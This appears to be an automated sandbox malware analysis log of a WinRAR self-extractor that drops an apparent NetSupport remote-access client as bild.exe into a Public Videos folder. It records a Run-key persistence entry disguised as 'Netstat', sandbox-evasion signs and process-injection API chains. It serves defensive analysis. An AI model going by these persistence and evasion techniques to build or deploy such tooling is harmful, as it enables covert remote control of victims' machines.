                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile written: C:\Users\Public\Public\Videos\Video\client32.iniJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: file.exeStatic file information: File size 2138286 > 1048576
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Public\Videos\Video\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000004.00000002.4161525589.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000005.00000002.1828324203.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.1906366443.000000006C951000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000004.00000002.4161859396.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000005.00000002.1828623878.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.1906634135.000000006E512000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000004.00000000.1717304165.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000002.1826096354.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.1904648910.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.1903730466.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000004.00000002.4161743565.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000005.00000002.1828561187.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.1906535129.000000006D0B5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029590
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\__tmp_rar_sfx_access_check_7074718Jump to behavior
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016D8B6 push ecx; ret 0_2_0016D8C9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016CDF0 push eax; ret 0_2_0016CE0E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1116F055 push ecx; ret 4_2_1116F068
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11169F49 push ecx; ret 4_2_11169F5C
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1116F055 push ecx; ret 5_2_1116F068
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11169F49 push ecx; ret 5_2_11169F5C
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11040E01 push 3BFFFFFEh; ret 5_2_11040E06
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\bild.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11127E10
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115B1D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113290
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_110254A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_110258F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_11023BA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024280
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11112670 IsIconic,GetTickCount,4_2_11112670
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,5_2_1115B1D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,5_2_11139090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,5_2_11113290
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,5_2_110254A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_110258F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,5_2_11023BA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11024280
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11112670 IsIconic,GetTickCount,5_2_11112670
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,5_2_110C0BB0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_11143570
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Delayed program exit found
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110B8200 Sleep,ExitProcess,4_2_110B8200
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110B8200 Sleep,ExitProcess,5_2_110B8200
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeWindow / User API: threadDelayed 427Jump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeWindow / User API: threadDelayed 8039Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-57324
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-61256
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-61292
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-61388
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-61152
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI coverage: 6.1 %
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI coverage: 2.6 %
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe TID: 7580Thread sleep time: -55750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe TID: 7584Thread sleep time: -42700s >= -30000sJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe TID: 7580Thread sleep time: -2009750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0015A273
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0016A537
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_11065890
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106A0A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111266E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016C8D5 VirtualQuery,GetSystemInfo,0_2_0016C8D5
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: file.exe, 00000000.00000003.1708033734.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: file.exe, 00000000.00000003.1708033734.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E$
                                Source: bild.exe, 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.clazl*
